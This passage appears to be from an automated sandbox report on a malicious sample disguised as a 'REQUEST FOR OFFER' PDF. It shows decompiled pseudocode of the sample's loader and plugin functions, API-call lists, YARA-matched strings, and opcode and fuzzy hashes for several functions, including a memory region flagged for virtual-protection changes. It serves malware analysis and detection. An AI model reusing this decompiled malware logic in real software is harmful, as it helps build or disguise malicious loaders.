										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}

0x10001b20
0x10001b23
0x10001b26
0x10001b29
0x10001b2c
0x10001b2f
0x10001b32
0x10001b34
0x10001b37
0x10001b3c
0x10001b3f
0x10001b47
0x10001b4f
0x10001b51
0x10001b54
0x10001b5c
0x10001b5c
0x10001b61
0x10001b64
0x00000000
0x00000000
0x10001b6e
0x10001b71
0x10001b76
0x10001b78
0x10001beb
0x10001beb
0x10001beb
0x10001bef
0x10001bf2
0x10001bf4
0x10001c16
0x10001c18
0x10001c1b
0x10001c2a
0x10001c2c
0x10001c32
0x10001c32
0x10001c38
0x10001c3b
0x10001c3b
0x10001c3e
0x10001c3e
0x10001c44
0x10001c46
0x10001c46
0x10001c48
0x10001c4b
0x10001c4e
0x10001c54
0x10001c5a
0x10001c5d
0x10001c81
0x10001c84
0x00000000
0x00000000
0x10001c87
0x10001c89
0x10001c97
0x10001c9a
0x10001c9c
0x00000000
0x00000000
0x00000000
0x00000000
0x10001c9e
0x10001c9e
0x10001c9e
0x10001ca4
0x10001ca6
0x00000000
0x00000000
0x10001ca8
0x10001caa
0x10001cac
0x10001cae
0x00000000
0x00000000
0x00000000
0x10001cae
0x10001cb0
0x10001cb2
0x10001cb4
0x10001cb4
0x10001cba
0x10001cc0
0x10001cc2
0x10001cd6
0x10001cd6
0x10001cd8
0x10001cc4
0x10001cca
0x10001ccd
0x10001ccd
0x00000000
0x10001c5f
0x10001c5f
0x10001c5f
0x10001c60
0x10001c68
0x10001c6c
0x10001c72
0x10001c76
0x10001cde
0x10001ce1
0x10001ce5
0x10001d70
0x10001d74
0x10001b59
0x00000000
0x10001b59
0x00000000
0x10001d74
0x10001c62
0x10001c62
0x10001c63
0x00000000
0x00000000
0x10001c65
0x10001c66
0x00000000
0x00000000
0x00000000
0x10001c66
0x10001c5d
0x10001bf7
0x00000000
0x00000000
0x10001c00
0x10001c03
0x10001c10
0x10001c10
0x10001c05
0x00000000
0x10001c05
0x10001b7a
0x10001b7d
0x10001bce
0x10001bd1
0x10001be3
0x10001be3
0x10001be6
0x00000000
0x10001be6
0x10001bd3
0x10001bd8
0x00000000
0x00000000
0x10001bda
0x10001bdd
0x10001ced
0x10001cf0
0x10001cf0
0x10001cf2
0x10002048
0x1000204b
0x100020b2
0x10001d60
0x10001d63
0x10001d66
0x10001d69
0x10001d69
0x10001d6b
0x10001d6c
0x10001d6c
0x10001d6d
0x00000000
0x10001d6d
0x1000204d
0x10002050
0x10002057
0x10002057
0x1000205b
0x1000206f
0x1000206f
0x10002072
0x10002076
0x100020be
0x100020c1
0x100020c5
0x00000000
0x100020c5
0x10002078
0x1000207c
0x00000000
0x00000000
0x1000207e
0x10002085
0x10002085
0x1000208b
0x1000208e
0x100020aa
0x10002090
0x10002099
0x1000209c
0x1000209c
0x00000000
0x1000208e
0x1000205d
0x10002060
0x10002064
0x00000000
0x00000000
0x10002066
0x00000000
0x10002066
0x10002052
0x10002055
0x00000000
0x00000000
0x00000000
0x10002055
0x10001cf8
0x10001cf8
0x10001cf9
0x10001e29
0x10001e29
0x10001e2e
0x10001e31
0x00000000
0x00000000
0x10001e3e
0x00000000
0x10001fe5
0x10001fe8
0x10001feb
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x10001ff8
0x10001ff8
0x10001ffc
0x10002014
0x10002017
0x10002021
0x00000000
0x10002021
0x10001ffe
0x10001ffe
0x10002001
0x00000000
0x00000000
0x10002003
0x10002006
0x10002008
0x10002009
0x10002009
0x10002009
0x1000200a
0x1000200d
0x10002010
0x10002011
0x10001feb
0x10001fec
0x10001fed
0x10001ff0
0x10001ff3
0x10001ff6
0x00000000
0x00000000
0x00000000
0x10001ff6
0x00000000
0x10001e85
0x00000000
0x00000000
0x10001e91
0x00000000
0x00000000
0x10001e78
0x10001e7c
0x10001e80
0x00000000
0x00000000
0x10001fb6
0x10001fba
0x00000000
0x00000000
0x10001fc0
0x10001fc9
0x10001fd0
0x10001fd8
0x00000000
0x00000000
0x10001f53
0x10001f53
0x00000000
0x00000000
0x10001e9a
0x00000000
0x00000000
0x10002040
0x00000000
0x00000000
0x10002030
0x00000000
0x00000000
0x10002034
0x00000000
0x00000000
0x1000203c
0x00000000
0x00000000
0x10001f76
0x00000000
0x00000000
0x10001f5b
0x10001f5d
0x00000000
0x00000000
0x10001f7e
0x00000000
0x00000000
0x10001f63
0x00000000
0x00000000
0x10001f67
0x00000000
0x00000000
0x10002038
0x10002042
0x10002042
0x00000000
0x00000000
0x10001f86
0x10001f8a
0x10001f8f
0x10001f92
0x10001f93
0x10001f96
0x10001f9c
0x10001f9c
0x00000000
0x00000000
0x10002028
0x00000000
0x00000000
0x10001f6b
0x10001f6e
0x10001f70
0x00000000
0x00000000
0x10001ea1
0x10001ea1
0x00000000
0x00000000
0x10001f7a
0x10001f80
0x10001f80
0x10001ea3
0x10001ea3
0x10001ea6
0x10001ead
0x10001eb0
0x10001eb2
0x10001eb4
0x10001eb5
0x10001eb9
0x10001ebc
0x10001ec2
0x10001ec8
0x10001ec8
0x10001eca
0x10001eca
0x10001ecd
0x10001ed3
0x10001ed5
0x10001ed9
0x10001ede
0x10001ede
0x10001ee0
0x10001ee0
0x10001ee3
0x10001ee6
0x10001eef
0x10001ef5
0x10001ef8
0x10001ef8
0x10001efa
0x10001efd
0x10001f03
0x00000000
0x10001f03
0x10001ec4
0x10001ec6
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e45
0x10001e4b
0x10001e4e
0x10001e50
0x10001e50
0x10001e53
0x10001e57
0x10001e64
0x10001e66
0x10001e6c
0x10001e6c
0x10001e6c
0x00000000
0x00000000
0x10001fa4
0x10001fa8
0x10001fad
0x10001fb0
0x10001f09
0x10001f09
0x10001f0b
0x00000000
0x00000000
0x10001f11
0x10001f11
0x10001f15
0x10001f1c
0x10001f40
0x10001f40
0x10001f44
0x10001f46
0x10001f49
0x10001f49
0x10001f4c
0x10001f4c
0x00000000
0x10001f44
0x10001f21
0x10001f24
0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000002.00000002.54387884763.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.54387828656.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387928274.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.54387958519.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: e30de6db6a834bf10e5b97208fc3b89c024e60f2dd318f1058e55d56930b3bd8
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 032EF95D Relevance: 7.0, Strings: 5, Instructions: 784COMMON

Download Yara Rule

Strings

|v7, xrefs: 032F060F
R{Z[, xrefs: 032EFCC6
R{Z[, xrefs: 032EFCC1
{Qaj, xrefs: 032EFE70
=a , xrefs: 032EFB6F

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID: =a $R{Z[$R{Z[${Qaj$|v7
API String ID: 2706961497-1985935529
Opcode ID: bfe81848c804dbefde5779d82dcfbec50a9617d51fdb2a6267105ddec7172f82
Instruction ID: ed85b9d8432b52fbac1ee00428122f6291967b8c359a5680a6a412fc3356660b
Opcode Fuzzy Hash: bfe81848c804dbefde5779d82dcfbec50a9617d51fdb2a6267105ddec7172f82
Instruction Fuzzy Hash: 80525A356143868FDB35DE3889987DA7BE26F52360F89C2ADCC898F296D3348585C712

Uniqueness

Uniqueness Score: -1.00%

Function 032D6C8B Relevance: 3.9, Strings: 3, Instructions: 118COMMON

Download Yara Rule

Strings

TQ@x, xrefs: 032D6D47
C bs, xrefs: 032D6C9D
`, xrefs: 032D6E1F

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: C bs$TQ@x$`
API String ID: 0-3558737980
Opcode ID: c63f8ea3f0bc557d88c90a5dc5f043ec34de8197a1af56b59511ffd0400aa9f3
Instruction ID: 06d279510c45a2e280d24d36213708c7cd1fecd1e6f59bd84425824581b29e2a
Opcode Fuzzy Hash: c63f8ea3f0bc557d88c90a5dc5f043ec34de8197a1af56b59511ffd0400aa9f3
Instruction Fuzzy Hash: 96319F3A6103569FEF349D2D9DB63CF22A35F55290FEA012FCCC997245DB3489C68641

Uniqueness

Uniqueness Score: -1.00%

Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00402104() {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x50)) = E00402C53(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x38)) = E00402C53(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402C53(2);
				 *((intOrPtr*)(_t107 - 0x48)) = E00402C53(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402C53(0x45);
				_t52 =  *(_t107 - 0x18);
				 *(_t107 - 0x44) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405C3D( *((intOrPtr*)(_t107 - 0x38))) == 0) {
					E00402C53(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x30);
					 *((intOrPtr*)(_t107 - 0x10)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x38)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\Arthur\\AppData\\Local\\Folkedansens\\Suffigere\\Glaucophane");
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x48));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x44));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x30));
							 *((intOrPtr*)(_t107 - 0x10)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x50)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x30));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x10)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x0040210d
0x00402117
0x00402121
0x0040212b
0x00402136
0x00402139
0x00402153
0x00402156
0x0040215c
0x0040215f
0x00402169
0x0040216d
0x0040216d
0x00402172
0x00402183
0x0040218b
0x00402242
0x00402242
0x00402249
0x00402191
0x00402191
0x004021a0
0x004021a4
0x004021a7
0x004021ad
0x004021bb
0x004021be
0x004021c0
0x004021cb
0x004021cb
0x004021d0
0x004021d2
0x004021d9
0x004021d9
0x004021dc
0x004021e5
0x004021e8
0x004021ee
0x004021f0
0x004021fa
0x004021fa
0x004021fd
0x00402206
0x00402209
0x00402212
0x00402218
0x0040221a
0x00402228
0x00402228
0x0040222b
0x00402231
0x00402231
0x00402234
0x0040223a
0x00402240
0x00402255
0x00000000
0x00000000
0x00000000
0x00402240
0x0040224b
0x00402ade
0x00402aea

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183

Strings

C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane, xrefs: 004021C3

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: CreateInstance
String ID: C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane
API String ID: 542301482-444594325
Opcode ID: f1e4a033d03d4b5ff0b7887c5693dbf04fecb154692b9e208e16cd0bc31694ac
Instruction ID: b00d62d96fbd26c6029c0673ccd5b1c7279e8b7dfa3a64310cdf9804068cc62f
Opcode Fuzzy Hash: f1e4a033d03d4b5ff0b7887c5693dbf04fecb154692b9e208e16cd0bc31694ac
Instruction Fuzzy Hash: C5414C71A00219AFCB00EFE4C988A9D7BB5FF48358B20457AF505EB2D1DB799982CB54

Uniqueness

Uniqueness Score: -1.00%

Function 032D6CCB Relevance: 2.6, Strings: 2, Instructions: 127COMMON

Download Yara Rule

Strings

TQ@x, xrefs: 032D6D47
`, xrefs: 032D6E1F

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: TQ@x$`
API String ID: 0-2283116869
Opcode ID: 41c59c4a6304ee1781e9469c75e028d2c6971b996f00047132a2542bba23cdf9
Instruction ID: 7dedfb78e226f24b946c502e754f13f95e8c70dc10f9163cc7560c4833d627f1
Opcode Fuzzy Hash: 41c59c4a6304ee1781e9469c75e028d2c6971b996f00047132a2542bba23cdf9
Instruction Fuzzy Hash: 9B413C36714FD55FEF759E2888A13DA2B916F03261FDF10AACC86CB685C67096C3C602

Uniqueness

Uniqueness Score: -1.00%

Function 032D587A Relevance: 1.5, Strings: 1, Instructions: 268COMMON

Download Yara Rule

Strings

|`Q, xrefs: 032D5ACF

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: |`Q
API String ID: 0-1493779072
Opcode ID: 2e2ae4157ab551d5b2abf5f26513a5b800d33f59f13e3c7e39f3b44266bfb20c
Instruction ID: 23b475c45f39949c3754cc820cddaf0999134f51efabaf5a64eed0b6bca5544b
Opcode Fuzzy Hash: 2e2ae4157ab551d5b2abf5f26513a5b800d33f59f13e3c7e39f3b44266bfb20c
Instruction Fuzzy Hash: 17B1363160878ACFDB34DE28CD993DA37B2EFA6350F58812ACC498B255D3718A81CB45

Uniqueness

Uniqueness Score: -1.00%

Function 032D3DD6 Relevance: 1.5, Strings: 1, Instructions: 256COMMON

Download Yara Rule

Strings

ob~W, xrefs: 032D41F2

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: ob~W
API String ID: 0-1306638120
Opcode ID: 61428ee05a241d3fcb8e4d42931f0066fe68f64428ba55db2f0138920c80a30e
Instruction ID: 14c238ba7b1c73b711f7b47c52c2a3874a24e559ee6a04736061e78b9565633f
Opcode Fuzzy Hash: 61428ee05a241d3fcb8e4d42931f0066fe68f64428ba55db2f0138920c80a30e
Instruction Fuzzy Hash: 54819D746143569BCF38EE78C9B4BEA37A69F95380F99453ECC4ADB210EB3085C18602

Uniqueness

Uniqueness Score: -1.00%

Function 032D5944 Relevance: 1.5, Strings: 1, Instructions: 237COMMON

Download Yara Rule

Strings

|`Q, xrefs: 032D5ACF

Memory Dump Source

Source File: 00000002.00000002.54387083303.00000000032D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_32d0000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Yara matches

Similarity

API ID:
String ID: |`Q
API String ID: 0-1493779072
Opcode ID: 0d530748d2fb7cff621c89abe1e071aae984397603718857d736c7c9fa53949f
Instruction ID: a1c8af6ea0480503e09b33702733adb8b706c83a57a49fb43e9a49ebcdf6eaab
Opcode Fuzzy Hash: 0d530748d2fb7cff621c89abe1e071aae984397603718857d736c7c9fa53949f
Instruction Fuzzy Hash: BEA10431608B9ACFDF35DF34CD943DA3BA2AF92310F59416ACC4A9B245D7B19682CB05

